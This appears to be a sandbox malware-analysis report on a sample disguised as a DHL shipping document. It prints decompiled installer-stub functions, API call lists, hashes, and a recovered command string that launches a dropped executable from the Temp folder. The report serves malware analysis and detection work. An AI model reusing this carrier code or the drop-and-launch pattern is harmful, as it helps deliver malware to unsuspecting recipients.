                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 2564846305-813528018
                                                              • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                              • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                              • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                              • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 91%
                                                              			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                                              0x00404795
                                                              0x004048c2
                                                              0x0040491f
                                                              0x00404923
                                                              0x004049f0
                                                              0x004049f2
                                                              0x004049f2
                                                              0x004049f8
                                                              0x004049f8
                                                              0x004049fb
                                                              0x00000000
                                                              0x00404a02
                                                              0x00404931
                                                              0x00404937
                                                              0x00404941
                                                              0x0040494c
                                                              0x0040494f
                                                              0x00404952
                                                              0x0040495d
                                                              0x00404960
                                                              0x00404967
                                                              0x00404974
                                                              0x00404985
                                                              0x0040498b
                                                              0x00404993
                                                              0x004049a1
                                                              0x004049a7
                                                              0x004049a7
                                                              0x00404967
                                                              0x004049b1
                                                              0x00000000
                                                              0x004049bc
                                                              0x004049c0
                                                              0x004049d0
                                                              0x004049d0
                                                              0x004049d6
                                                              0x004049e2
                                                              0x004049e2
                                                              0x00000000
                                                              0x004049e6
                                                              0x004049b1
                                                              0x004048cd
                                                              0x00000000
                                                              0x004048df
                                                              0x004048e4
                                                              0x004048ea
                                                              0x00000000
                                                              0x00000000
                                                              0x00404913
                                                              0x00404915
                                                              0x0040491a
                                                              0x00000000
                                                              0x0040491a
                                                              0x004048cd
                                                              0x0040479b
                                                              0x0040479e
                                                              0x004047a3
                                                              0x004047b4
                                                              0x004047b4
                                                              0x004047bc
                                                              0x004047bf
                                                              0x004047c3
                                                              0x004047c6
                                                              0x004047ca
                                                              0x004047cd
                                                              0x004047d0
                                                              0x004047d3
                                                              0x004047da
                                                              0x004047dc
                                                              0x004047dc
                                                              0x004047e6
                                                              0x004047f3
                                                              0x004047fd
                                                              0x00404802
                                                              0x00404805
                                                              0x0040480a
                                                              0x00404821
                                                              0x00404828
                                                              0x0040483b
                                                              0x0040483e
                                                              0x00404852
                                                              0x00404859
                                                              0x0040485e
                                                              0x00404863
                                                              0x00404863
                                                              0x00404871
                                                              0x0040487f
                                                              0x00404891
                                                              0x00404896
                                                              0x004048a6
                                                              0x004048a8
                                                              0x00000000

                                                              APIs
                                                              • CheckDlgButton.USER32 ref: 00404821
                                                              • GetDlgItem.USER32 ref: 00404835
                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                              • GetSysColor.USER32(?), ref: 00404863
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                              • lstrlenW.KERNEL32(?), ref: 00404884
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                              • GetDlgItem.USER32 ref: 004048FF
                                                              • SendMessageW.USER32(00000000), ref: 00404906
                                                              • GetDlgItem.USER32 ref: 00404931
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                              • SetCursor.USER32(00000000), ref: 00404985
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                              • SetCursor.USER32(00000000), ref: 004049A1
                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                              Strings
                                                              • "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy, xrefs: 00404960
                                                              • N, xrefs: 0040491F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                              • String ID: "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy$N
                                                              • API String ID: 3103080414-850291055
                                                              • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                              • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                              • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                              • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                              0x004062ae
                                                              0x004062b7
                                                              0x004062be
                                                              0x004062c8
                                                              0x004062dc
                                                              0x00406304
                                                              0x0040630b
                                                              0x0040630f
                                                              0x00406313
                                                              0x00406333
                                                              0x0040633a
                                                              0x00406344
                                                              0x00406351
                                                              0x00406356
                                                              0x0040635b
                                                              0x0040635f
                                                              0x0040636e
                                                              0x00406370
                                                              0x0040637d
                                                              0x00406381
                                                              0x0040641c
                                                              0x00000000
                                                              0x00406397
                                                              0x004063a4
                                                              0x004063c8
                                                              0x004063cc
                                                              0x004063eb
                                                              0x004063ef
                                                              0x004063ef
                                                              0x004063f1
                                                              0x004063fa
                                                              0x00406405
                                                              0x00406410
                                                              0x00406416
                                                              0x00000000
                                                              0x00406416
                                                              0x004063ce
                                                              0x004063d1
                                                              0x004063dc
                                                              0x004063d8
                                                              0x004063da
                                                              0x004063db
                                                              0x004063db
                                                              0x004063e3
                                                              0x004063e5
                                                              0x00000000
                                                              0x004063e5
                                                              0x004063af
                                                              0x004063b5
                                                              0x00000000
                                                              0x004063b5
                                                              0x00406381
                                                              0x0040635f
                                                              0x004062de
                                                              0x004062e9
                                                              0x004062f2
                                                              0x004062f6
                                                              0x00000000
                                                              0x00000000
                                                              0x004062f6
                                                              0x00406427

                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                              • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                              • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                              • wsprintfA.USER32 ref: 0040632D
                                                              • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                              • GlobalFree.KERNEL32 ref: 00406416
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe,80000000,00000003), ref: 0040615C
                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                              • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                              • API String ID: 2171350718-2295842750
                                                              • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                              • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                              • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                              • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 90%
                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                              0x0040100a
                                                              0x00401039
                                                              0x00401047
                                                              0x0040104d
                                                              0x00401051
                                                              0x0040105b
                                                              0x00401061
                                                              0x00401064
                                                              0x004010f3
                                                              0x00401089
                                                              0x0040108c
                                                              0x004010a6
                                                              0x004010bd
                                                              0x004010cc
                                                              0x004010cf
                                                              0x004010d5
                                                              0x004010d9
                                                              0x004010e4
                                                              0x004010ed
                                                              0x004010ef
                                                              0x004010ef
                                                              0x00401100
                                                              0x00401105
                                                              0x0040110d
                                                              0x00401110
                                                              0x00401112
                                                              0x00401118
                                                              0x0040111f
                                                              0x00401126
                                                              0x00401130
                                                              0x00401142
                                                              0x00401156
                                                              0x00401160
                                                              0x00401165
                                                              0x00401165
                                                              0x00401110
                                                              0x0040116e
                                                              0x00000000
                                                              0x00401178
                                                              0x00401010
                                                              0x00401013
                                                              0x00401015
                                                              0x0040101f
                                                              0x0040101f
                                                              0x00000000

                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32 ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32 ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                              • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                              • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                              • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 72%
                                                              			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
